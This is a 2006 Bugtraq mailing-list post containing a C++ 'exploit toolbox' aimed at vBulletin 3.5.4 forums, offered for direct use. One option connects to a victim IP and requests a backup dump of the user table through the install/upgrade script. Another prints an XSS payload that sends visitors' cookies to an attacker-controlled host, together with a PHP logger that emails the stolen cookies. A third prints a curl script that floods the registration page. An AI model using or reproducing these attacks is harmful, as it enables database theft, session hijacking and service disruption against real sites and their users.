[<prev] [next>] [day] [month] [year] [list]
Message-ID: <20061015212800.27453.qmail@securityfocus.com>
Date: 15 Oct 2006 21:28:00 -0000
From: m4k3@...security.securityfocus.com, "[dot]"@securityfocus.com,
de@...urityfocus.com
To: bugtraq@...urityfocus.com
Subject: vbulletin Exploit Tool Box
This Box continue the 3 vbulletin exploits, under it you can use the vbulletin install path exploit, the other two exploits can be only watched.
Code:
#include <unistd.h>
#include <stdio.h>
#include <stdlib.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <netdb.h>
#include <arpa/inet.h>
#include <errno.h>
#include <string.h>
#include <iostream>
using namespace std;
string exploit;
string answer;
string answer2;
long s;
sockaddr_in addr;
char IPaddr[1024];
/*You have to change to the right path*/
char sget[] = "GET /install/upgrade_300b3.php?step=backup&do=sqltable&table=user HTTP/1.0\r\nConnection: Close\r\n\r\n";
char stry[41943040];
long I;
long M, J, K, L;
int i;
int main()
{
cout << "> Welcome to vbulletin 3.5.4 Exploit-Toolbox v.0.1.1" << endl;
cout << "> Here you can find all released vbullein 3.5.4 exploits" << endl;
cout << "> Press 1 for Install_path exploit" << endl;
cout << "> Press 2 for Xss vbulletin 3.5.x (test: 3.5.4)" << endl;
cout << "> Press 3 for vBulletin 3.5.4 Flood Exploit" << endl;
cout << "> Programm Author M4k3, www.pldsoft.com" << endl;
cout << "> Copyright by PLDsoft.com" << endl;
cout << "> Number? "; cin >> exploit;
cout << endl;
if (exploit == "1")
{
cout << " ____________________ " << endl;
cout << " |---PLDsoft.com------|" << endl;
cout << " |--------------------|" << endl;
cout << " |-vbulletin 3.5.4---|" << endl;
cout << " |install_path exploit|" << endl;
cout << " |____________________|" << endl;
cout << "##############################################" << endl;
cout << "vBulltin 3.5.4 exploit.....install path is open or not secure" << endl;
cout << "###############################################" << endl;
cout << endl;
cout << "Discovered By M4k3 PLDsoft Security Team, www.pldsoft.com" << endl;
cout << "Remote : Yes" << endl;
cout << "Critical Level : Dangerous"<< endl;
cout << "############################################" << endl;
cout << "Affected software description :" << endl;
cout << endl;
cout << "Application : vbulletin" << endl;
cout << "version : latest version [ 3.60 Release 4 ]" << endl;
cout << "URL : http://www.vbulletin.com" << endl;
cout << endl;
cout << "########################################" << endl;
cout << "Exploit:" << endl;
cout << endl;
cout << "www.vicitimsite.com/forumpath/install/upgrade.php?step=[writehereanylettersbutnotnumbers!]" << endl;
cout << endl;
cout << "when it works, you can download the database..." << endl;
cout << endl;
cout << "########################################" << endl;
cout << "Contact:" << endl;
cout << "Nick: M4k3" << endl;
cout << "E-mail: m4k3@...soft.com" << endl;
cout << "Website: http://www.pldsoft.com" << endl;
cout << "_______End of Exploit______" << endl;
cout << endl;
sleep(1);
cout << "Use the exploit now?" << endl;
cout << "yes/no: "; cin >> answer;
}
if (answer == "yes")
{
cout << "Starting vbulletin 3.5.4 install_path exploit" << endl;
{
cout << "Insert IP: "; cin >> IPaddr;
M = 0;
J = 0;
K = 0;
L = 0;
while(IPaddr[i] != 0)
{
if(IPaddr[i] >= '0' && IPaddr[i] <= '9')
{
L *= 10;
L += IPaddr[i] - '0';
K++;
if(K > 3)
{
M = -1;
break;
}
}
else if(IPaddr[i] == '.')
{
if(K == 0)
{
M = -1;
break;
}
if(L >= 255)
{
M = -1;
break;
}
J++;
K = 0;
L = 0;
}
else
{
M = -1;
break;
}
M++;
}
if(M == -1 || J != 3)
{
cout << "> Invalid IP-Address!" << endl;
return 0;
}
s = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
addr.sin_family = AF_INET;
inet_aton(IPaddr, &addr.sin_addr);
addr.sin_port = htons(80);
if(connect(s, (sockaddr*) &addr, sizeof(sockaddr_in)))
{
printf("Failure: Connection Rested!\r\n");
close(s);
return 1;
}
if(send(s, sget, strlen(sget), 0) == 0)
{
printf("Failure: Not able to send packets!\r\n");
close(s);
return 2;
}
if((I = recv(s, stry, 41943040, 0)) == 0)
{
printf("Failure: Not able to receive packets!\r\n");
close(s);
return 3;
return 0;
}
close(s);
printf("Packets received succesfully!\r\nBytes of received Data: %d\r\n", I);
printf("%s", stry);
return 0;
}
}
else if (exploit == "2")
{
cout << "=> Xss Vbulletin 3.5.x ( test: 3.5.4 )"<< endl;
cout << "=> Author: SpiderZ"<< endl;
cout << "=> Sito: www.spiderz.tk"<< endl;
cout << endl;
cout << "_____________________________________________________________"<< endl;
cout << endl;
cout << "( 1 )"<< endl;
cout << endl;
cout << "<?php"<< endl;
cout << "$ip_adresse = $_SERVER['REMOTE_ADDR']; "<< endl;
cout << "if(!empty($ip_adresse)) "<< endl;
cout << "{ "<< endl;
cout << "echo 'il tuo ip ?: ',$ip_adresse; "<< endl;
cout << "} "<< endl;
cout << "else "<< endl;
cout << "{ "<< endl;
cout << "echo 'Impossible d\'afficher l\'IP'; "<< endl;
cout << "} "<< endl;
cout << "?> "<< endl;
cout << endl;
cout << "<a href=""log.php""></a><?"<< endl;
cout << "$xx1=$HTTP_SERVER_VARS['SERVER_PORT'];"<< endl;
cout << "$day = date(""d"",time()); $month = date(""m"",time()); $year = date(""Y"",time());"<< endl;
cout << "if ($REMOTE_HOST == "") $visitor_info = $REMOTE_ADDR;"<< endl;
cout << "else $visitor_info = $REMOTE_HOST;"<< endl;
cout << "$base = 'http://' . $HTTP_SERVER_VARS['SERVER_NAME'] . $PHP_SELF;"<< endl;
cout << "$x1=`host $REMOTE_ADDR|grep Name`;"<< endl;
cout << "$x2=$REMOTE_PORT;"<< endl;
cout << "?>"<< endl;
cout << endl;
cout << "<?php"<< endl;
cout << "$cookie = $_GET['c'];"<< endl;
cout << "?>"<< endl;
cout << endl;
cout << "<?php"<< endl;
cout << "$myemail = ""YOUR ADDRESS E-MAIL"";"<< endl;
cout << "$today = date(""l, F j, Y, g:i a"") ;"<< endl;
cout << "$subject = ""Xss Vbulletin"" ;"<< endl;
cout << "$message = ""Xss: Hacking"""<< endl;
cout << "Ip: $ip_adresse "<< endl;
cout << "Cookie: $cookie"<< endl;
cout << "Url: $base"<< endl;
cout << "porta usata: $xx1"<< endl;
cout << "remote port: $x2"<< endl;
cout << "Giorno & Ora : $today \n"<< endl;
cout << endl;
cout << "$from = ""From: $myemail\r\n"";"<< endl;
cout << "mail($myemail, $subject, $message, $from);"<< endl;
cout << "?>"<< endl;
cout << endl;
cout << "--------------------------------------------------------------------"<< endl;
cout << endl;
cout << "<?php"<< endl;
cout << "$myemail = ""YOUR ADDRESS E-MAIL"";"<< endl;
cout << endl;
cout << "--------------------------------------------------------------------"<< endl;
cout << endl;
cout << "( 2 )"<< endl;
cout << endl;
cout << "--------------------------------------------------------------------"<< endl;
cout << endl;
cout << "Name file: image.gif"<< endl;
cout << endl;
cout << "--------------------------------------------------------------------"<< endl;
cout << endl;
cout << endl;
cout << "<pre a='>' onmouseover='document.location=""http://YOUR ADDRESS WEB.com/exploit.php?"" "<< endl;
cout << "c=""+document.cookie' b='</pre' >"""<< endl;
cout << endl;
cout << endl;
cout << "--------------------------------------------------------------------"<< endl;
cout << endl;
cout << "location=""http://YOUR ADDRESS WEB.com"""<< endl;
cout << endl;
cout << "--------------------------------------------------------------------"<< endl;
cout << endl;
cout << endl;
cout << "( 3 )"<< endl;
cout << endl;
cout << "--------------------------------------------------------------------"<< endl;
cout << endl;
cout << "Like Using"<< endl;
cout << "--------------------------------------------------------------------"<< endl;
cout << endl;
cout << "1 new thread"<< endl;
cout << "2 <a href=""http://YOUR ADDRESS WEB.com/IMAGE.GIF"" target=""_blank"">BEAUTIFUL GIRL</a>'"<< endl;
cout << "3 Submit"<< endl;
cout << "4 It waits for"<< endl;
cout << endl;
cout << "--------------------------------------------------------------------"<< endl;
cout << endl;
cout << endl;
cout << "# www.spiderz.tk " << endl;
cout << endl;
cout << "_______End of Exploit______" << endl;
}
else if (exploit == "3")
{
cout << "Script : vBulletin Version 3.5.4" << endl;
cout << endl;
cout << "site : www.vbulletin.com" << endl;
cout << endl;
cout << "Exploit by : x-boy" << endl;
cout << endl;
cout << "E-mail : Dicomdk (at) gmail (dot) com [email concealed]" << endl;
cout << endl;
cout << "Type : Registration flood in register.php" << endl;
cout << endl;
cout << "Thanks to : Simo64" << endl;
cout << endl;
cout << endl;
cout << "Code of exploit (For english version , you can change it to other language)=> exploit.php" << endl;
cout << endl;
cout << "cURL Must be activated (http://curl.haxx.se)" << endl;
cout << endl;
cout << "Sorry for my bad English :-)" << endl;
cout << endl;
cout << endl;
cout << "<?" << endl;
cout << endl;
cout << "set_time_limit(60);" << endl;
cout << endl;
cout << "//You can change 10 to other numbers" << endl;
cout << endl;
cout << "for($i = 1 ; $i <= 10 ; $i++)" << endl;
cout << endl;
cout << "{" << endl;
cout << endl;
cout << "//to put curl to send POST request" << endl;
cout << endl;
cout << "$ch = curl_init();" << endl;
cout << endl;
cout << "//change http://localhost/vb3 to the url of the script" << endl;
cout << endl;
cout << "curl_setopt($ch , CURLOPT_URL , 'http://localhost/vb3/register.php');" << endl;
cout << endl;
cout << "curl_setopt($ch , CURLOPT_POST , 1) ;" << endl;
cout << endl;
cout << "curl_setopt($ch , CURLOPT_POSTFIELDS ," << endl;
cout << "'agree=1&s=&do=addmember&url=index.php&password_md5=&passwordconfirm_md5" << endl;
cout << "=&day=0&month=0&year=0&username=x-boy'.$i.'&password=elmehdi&password" << endl;
cout << "con" << endl;
cout << "firm=elmehdi&email=dicomdk'.$i.'@...il.com&emailconfirm=dicomdk'.$i.'@gm" << endl;
cout << "ail.com&referrername=&timezoneoffset=(GMT -12:00) Eniwetok, Kwajalein&dst=DST" << endl;
cout << "corrections always on&options[showemail]=1');" << endl;
cout << endl;
cout << "curl_exec($ch);" << endl;
cout << endl;
cout << "curl_close($ch);" << endl;
cout << endl;
cout << "}" << endl;
cout << endl;
cout << "//Flood finished good luck" << endl;
cout << endl;
cout << "?>" << endl;
cout << endl;
cout << "____End of Exploit___" << endl;
}
else
{
cout << "File not found / Failed to open file" << endl;
}
cout << endl;
cout << endl;
cout << endl;
cout << "Copyright and Programming by PLDsoft.com, [Author M4k3]" << endl;
cout << "Contact m4k3@...security[dot]de" << endl;
return 0;
}
More Informations by: PLDsoft.com
Powered by blists - more mailing lists